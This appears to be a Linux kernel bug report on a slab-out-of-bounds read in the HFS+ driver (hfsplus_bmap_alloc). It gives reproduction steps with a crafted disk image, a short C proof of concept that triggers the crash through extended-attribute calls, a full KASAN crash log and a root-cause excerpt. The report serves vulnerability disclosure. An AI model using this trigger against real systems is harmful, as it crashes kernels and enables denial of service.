Created attachment 276887 [details] The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t hfsplus 243.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> // derived from https://github.com/oracle/kernel-fuzzing/blob/master/include/mount.hh static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 177.089299] ================================================================== [ 177.090973] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x2f2/0x690 [ 177.092451] Read of size 8 at addr ffff8801e2813170 by task poc/1408 [ 177.094086] CPU: 0 PID: 1408 Comm: poc Not tainted 4.18.0-rc1+ #6 [ 177.094094] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 177.094100] Call Trace: [ 177.094137] dump_stack+0x7b/0xb5 [ 177.094172] print_address_description+0x70/0x290 [ 177.094178] kasan_report+0x291/0x390 [ 177.094183] ? hfsplus_bmap_alloc+0x2f2/0x690 [ 177.094199] __asan_load8+0x54/0x90 [ 177.094205] hfsplus_bmap_alloc+0x2f2/0x690 [ 177.094210] ? hfsplus_btree_write+0x1d0/0x1d0 [ 177.094214] ? save_stack+0xb5/0xd0 [ 177.094218] ? save_stack+0x46/0xd0 [ 177.094221] ? kasan_kmalloc+0xad/0xe0 [ 177.094225] ? __kmalloc+0x11f/0x240 [ 177.094230] ? hfsplus_find_init+0x54/0xc0 [ 177.094235] ? hfsplus_create_attr+0x10c/0x2b0 [ 177.094239] ? __hfsplus_setxattr+0x2d5/0x1160 [ 177.094244] ? hfsplus_setxattr+0x8a/0xb0 [ 177.094247] ? hfsplus_user_setxattr+0x27/0x30 [ 177.094260] ? __vfs_setxattr+0x7c/0xa0 [ 177.094265] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.094269] ? vfs_setxattr+0xb3/0xc0 [ 177.094272] ? setxattr+0x1b3/0x260 [ 177.094276] ? path_setxattr+0x134/0x170 [ 177.094280] ? __x64_sys_setxattr+0x6d/0x80 [ 177.094302] ? do_syscall_64+0x78/0x170 [ 177.094318] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094324] hfs_btree_inc_height+0xd3/0x450 [ 177.094330] ? hfs_bnode_split+0x6b0/0x6b0 [ 177.094344] ? char2uni+0x8f/0xf0 [ 177.094349] ? char2uni+0x50/0x50 [ 177.094355] hfsplus_brec_insert+0x679/0x6c0 [ 177.094360] ? hfsplus_brec_find+0xe0/0x2e0 [ 177.094366] ? hfsplus_brec_keylen+0x130/0x130 [ 177.094370] ? __kmalloc+0x11f/0x240 [ 177.094376] hfsplus_create_attr+0x263/0x2b0 [ 177.094381] ? hfsplus_attr_exists+0x140/0x140 [ 177.094390] ? hfsplus_find_init+0x54/0xc0 [ 177.094399] ? strncmp+0x3d/0xc0 [ 177.094404] __hfsplus_setxattr+0x2d5/0x1160 [ 177.094426] ? unwind_get_return_address+0x36/0x50 [ 177.094432] ? kasan_check_write+0x14/0x20 [ 177.094437] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 177.094443] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 177.094447] ? save_stack+0x46/0xd0 [ 177.094451] ? kasan_kmalloc+0xad/0xe0 [ 177.094455] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.094460] ? hfsplus_setxattr+0x4c/0xb0 [ 177.094463] ? hfsplus_user_setxattr+0x27/0x30 [ 177.094467] ? __vfs_setxattr+0x7c/0xa0 [ 177.094471] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.094474] ? vfs_setxattr+0xb3/0xc0 [ 177.094478] ? setxattr+0x1b3/0x260 [ 177.094481] ? path_setxattr+0x134/0x170 [ 177.094485] ? __x64_sys_setxattr+0x6d/0x80 [ 177.094490] ? do_syscall_64+0x78/0x170 [ 177.094494] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094499] ? save_stack+0xb5/0xd0 [ 177.094502] ? save_stack+0x46/0xd0 [ 177.094505] ? kasan_kmalloc+0xad/0xe0 [ 177.094509] ? __kmalloc_node+0x11e/0x2e0 [ 177.094522] ? kvmalloc_node+0x31/0x80 [ 177.094526] ? setxattr+0x114/0x260 [ 177.094530] ? path_setxattr+0x134/0x170 [ 177.094534] ? __x64_sys_setxattr+0x6d/0x80 [ 177.094538] ? do_syscall_64+0x78/0x170 [ 177.094542] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094546] ? save_stack+0xb5/0xd0 [ 177.094549] ? save_stack+0x46/0xd0 [ 177.094553] ? __kasan_slab_free+0x13c/0x1a0 [ 177.094556] ? kasan_slab_free+0xe/0x10 [ 177.094560] ? kmem_cache_free+0x89/0x1e0 [ 177.094569] ? putname+0x80/0x90 [ 177.094573] ? filename_lookup+0x191/0x280 [ 177.094577] ? kasan_unpoison_shadow+0x36/0x50 [ 177.094581] ? kasan_kmalloc+0xad/0xe0 [ 177.094586] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.094591] hfsplus_setxattr+0x8a/0xb0 [ 177.094596] hfsplus_user_setxattr+0x27/0x30 [ 177.094600] __vfs_setxattr+0x7c/0xa0 [ 177.094605] __vfs_setxattr_noperm+0x8d/0x200 [ 177.094609] vfs_setxattr+0xb3/0xc0 [ 177.094614] setxattr+0x1b3/0x260 [ 177.094618] ? vfs_setxattr+0xc0/0xc0 [ 177.094621] ? filename_lookup+0x191/0x280 [ 177.094625] ? filename_parentat+0x2b0/0x2b0 [ 177.094630] ? kasan_kmalloc+0xad/0xe0 [ 177.094635] ? kasan_check_write+0x14/0x20 [ 177.094657] ? strncpy_from_user+0xa8/0x1c0 [ 177.094670] ? __mnt_is_readonly.part.13+0x23/0x30 [ 177.094676] ? __mnt_want_write+0x9d/0xb0 [ 177.094681] path_setxattr+0x134/0x170 [ 177.094685] ? setxattr+0x260/0x260 [ 177.094690] __x64_sys_setxattr+0x6d/0x80 [ 177.094695] do_syscall_64+0x78/0x170 [ 177.094701] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094720] RIP: 0033:0x7fc353f381fa [ 177.094722] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 177.094785] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 177.094794] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa [ 177.094797] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0 [ 177.094799] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000 [ 177.094802] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20 [ 177.094804] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000 [ 177.095151] Allocated by task 1408: [ 177.095876] save_stack+0x46/0xd0 [ 177.095880] kasan_kmalloc+0xad/0xe0 [ 177.095884] __kmalloc+0x11f/0x240 [ 177.095888] __hfs_bnode_create+0xc6/0x3f0 [ 177.095892] hfsplus_bnode_find+0x1f0/0x500 [ 177.095896] hfsplus_bmap_alloc+0x296/0x690 [ 177.095900] hfs_btree_inc_height+0xd3/0x450 [ 177.095904] hfsplus_brec_insert+0x679/0x6c0 [ 177.095908] hfsplus_create_attr+0x263/0x2b0 [ 177.095913] __hfsplus_setxattr+0x2d5/0x1160 [ 177.095917] hfsplus_setxattr+0x8a/0xb0 [ 177.095924] hfsplus_user_setxattr+0x27/0x30 [ 177.095928] __vfs_setxattr+0x7c/0xa0 [ 177.095932] __vfs_setxattr_noperm+0x8d/0x200 [ 177.095935] vfs_setxattr+0xb3/0xc0 [ 177.095938] setxattr+0x1b3/0x260 [ 177.095941] path_setxattr+0x134/0x170 [ 177.095945] __x64_sys_setxattr+0x6d/0x80 [ 177.095949] do_syscall_64+0x78/0x170 [ 177.095953] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.096298] Freed by task 0: [ 177.096896] (stack is not available) [ 177.097952] The buggy address belongs to the object at ffff8801e2813100 which belongs to the cache kmalloc-96 of size 96 [ 177.100418] The buggy address is located 16 bytes to the right of 96-byte region [ffff8801e2813100, ffff8801e2813160) [ 177.102812] The buggy address belongs to the page: [ 177.103793] page:ffffea00078a04c0 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0 [ 177.105412] flags: 0x2ffff0000000100(slab) [ 177.106250] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500 [ 177.107793] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000 [ 177.109347] page dumped because: kasan: bad access detected [ 177.110784] Memory state around the buggy address: [ 177.111755] ffff8801e2813000: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc [ 177.113212] ffff8801e2813080: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc [ 177.114657] >ffff8801e2813100: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc [ 177.116099] ^ [ 177.117488] ffff8801e2813180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 177.118931] ffff8801e2813200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 177.129577] ================================================================== [ 177.131051] Disabling lock debugging due to kernel taint [ 177.133614] general protection fault: 0000 [#1] SMP KASAN PTI [ 177.134841] CPU: 1 PID: 1408 Comm: poc Tainted: G B 4.18.0-rc1+ #6 [ 177.136473] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 177.138439] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690 [ 177.139450] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff [ 177.143261] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286 [ 177.144325] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08 [ 177.145751] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8 [ 177.147177] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499 [ 177.148611] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100 [ 177.150034] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00 [ 177.151455] FS: 00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 177.153082] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 177.154236] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0 [ 177.155667] Call Trace: [ 177.156187] ? hfsplus_btree_write+0x1d0/0x1d0 [ 177.157129] ? save_stack+0xb5/0xd0 [ 177.157850] ? save_stack+0x46/0xd0 [ 177.158571] ? kasan_kmalloc+0xad/0xe0 [ 177.159348] ? __kmalloc+0x11f/0x240 [ 177.160085] ? hfsplus_find_init+0x54/0xc0 [ 177.160937] ? hfsplus_create_attr+0x10c/0x2b0 [ 177.161844] ? __hfsplus_setxattr+0x2d5/0x1160 [ 177.162747] ? hfsplus_setxattr+0x8a/0xb0 [ 177.163562] ? hfsplus_user_setxattr+0x27/0x30 [ 177.164485] ? __vfs_setxattr+0x7c/0xa0 [ 177.165274] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.166196] ? vfs_setxattr+0xb3/0xc0 [ 177.166945] ? setxattr+0x1b3/0x260 [ 177.167663] ? path_setxattr+0x134/0x170 [ 177.168477] ? __x64_sys_setxattr+0x6d/0x80 [ 177.169342] ? do_syscall_64+0x78/0x170 [ 177.170147] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.171206] hfs_btree_inc_height+0xd3/0x450 [ 177.172087] ? hfs_bnode_split+0x6b0/0x6b0 [ 177.172947] ? char2uni+0x8f/0xf0 [ 177.173637] ? char2uni+0x50/0x50 [ 177.174327] hfsplus_brec_insert+0x679/0x6c0 [ 177.175203] ? hfsplus_brec_find+0xe0/0x2e0 [ 177.176063] ? hfsplus_brec_keylen+0x130/0x130 [ 177.176988] ? __kmalloc+0x11f/0x240 [ 177.177727] hfsplus_create_attr+0x263/0x2b0 [ 177.178601] ? hfsplus_attr_exists+0x140/0x140 [ 177.179511] ? hfsplus_find_init+0x54/0xc0 [ 177.180370] ? strncmp+0x3d/0xc0 [ 177.181040] __hfsplus_setxattr+0x2d5/0x1160 [ 177.181928] ? unwind_get_return_address+0x36/0x50 [ 177.182904] ? kasan_check_write+0x14/0x20 [ 177.183747] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 177.184688] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 177.185870] ? save_stack+0x46/0xd0 [ 177.186591] ? kasan_kmalloc+0xad/0xe0 [ 177.187363] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.188334] ? hfsplus_setxattr+0x4c/0xb0 [ 177.189156] ? hfsplus_user_setxattr+0x27/0x30 [ 177.190062] ? __vfs_setxattr+0x7c/0xa0 [ 177.190850] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.191772] ? vfs_setxattr+0xb3/0xc0 [ 177.192537] ? setxattr+0x1b3/0x260 [ 177.193259] ? path_setxattr+0x134/0x170 [ 177.194066] ? __x64_sys_setxattr+0x6d/0x80 [ 177.194923] ? do_syscall_64+0x78/0x170 [ 177.195711] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.196784] ? save_stack+0xb5/0xd0 [ 177.197503] ? save_stack+0x46/0xd0 [ 177.198221] ? kasan_kmalloc+0xad/0xe0 [ 177.198992] ? __kmalloc_node+0x11e/0x2e0 [ 177.199825] ? kvmalloc_node+0x31/0x80 [ 177.200606] ? setxattr+0x114/0x260 [ 177.201323] ? path_setxattr+0x134/0x170 [ 177.202127] ? __x64_sys_setxattr+0x6d/0x80 [ 177.202979] ? do_syscall_64+0x78/0x170 [ 177.203762] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.204828] ? save_stack+0xb5/0xd0 [ 177.205548] ? save_stack+0x46/0xd0 [ 177.206266] ? __kasan_slab_free+0x13c/0x1a0 [ 177.207139] ? kasan_slab_free+0xe/0x10 [ 177.208001] ? kmem_cache_free+0x89/0x1e0 [ 177.208854] ? putname+0x80/0x90 [ 177.209525] ? filename_lookup+0x191/0x280 [ 177.210366] ? kasan_unpoison_shadow+0x36/0x50 [ 177.211279] ? kasan_kmalloc+0xad/0xe0 [ 177.212057] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.213034] hfsplus_setxattr+0x8a/0xb0 [ 177.213829] hfsplus_user_setxattr+0x27/0x30 [ 177.214709] __vfs_setxattr+0x7c/0xa0 [ 177.215470] __vfs_setxattr_noperm+0x8d/0x200 [ 177.216380] vfs_setxattr+0xb3/0xc0 [ 177.217104] setxattr+0x1b3/0x260 [ 177.217795] ? vfs_setxattr+0xc0/0xc0 [ 177.218552] ? filename_lookup+0x191/0x280 [ 177.219397] ? filename_parentat+0x2b0/0x2b0 [ 177.220285] ? kasan_kmalloc+0xad/0xe0 [ 177.221062] ? kasan_check_write+0x14/0x20 [ 177.221922] ? strncpy_from_user+0xa8/0x1c0 [ 177.222791] ? __mnt_is_readonly.part.13+0x23/0x30 [ 177.223771] ? __mnt_want_write+0x9d/0xb0 [ 177.224615] path_setxattr+0x134/0x170 [ 177.225393] ? setxattr+0x260/0x260 [ 177.226120] __x64_sys_setxattr+0x6d/0x80 [ 177.226949] do_syscall_64+0x78/0x170 [ 177.227710] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.228775] RIP: 0033:0x7fc353f381fa [ 177.229511] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 177.233310] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 177.234822] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa [ 177.236258] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0 [ 177.237686] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000 [ 177.239108] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20 [ 177.240543] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000 [ 177.241976] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 177.251777] ---[ end trace 7f5a46c7478f1295 ]--- [ 177.252789] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690 [ 177.253803] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff [ 177.257692] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286 [ 177.258764] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08 [ 177.260236] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8 [ 177.261707] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499 [ 177.263152] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100 [ 177.264643] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00 [ 177.266095] FS: 00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 177.267724] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 177.268944] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0 - Reason https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/btree.c#L391 while (len) { byte = data[off]; if (byte != 0xff) { for (m = 0x80, i = 0; i < 8; m >>= 1, i++) { if (!(byte & m)) { idx += i; data[off] |= m; set_page_dirty(*pagep); kunmap(*pagep); tree->free_nodes--; mark_inode_dirty(tree->inode); hfs_bnode_put(node); return hfs_bnode_create(tree, idx); } } } if (++off >= PAGE_SIZE) { kunmap(*pagep); data = kmap(*++pagep); off = 0; } idx += 8; len--; } In this loop, `byte = data[off];`, off is out of the boundary of the array `data`. Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.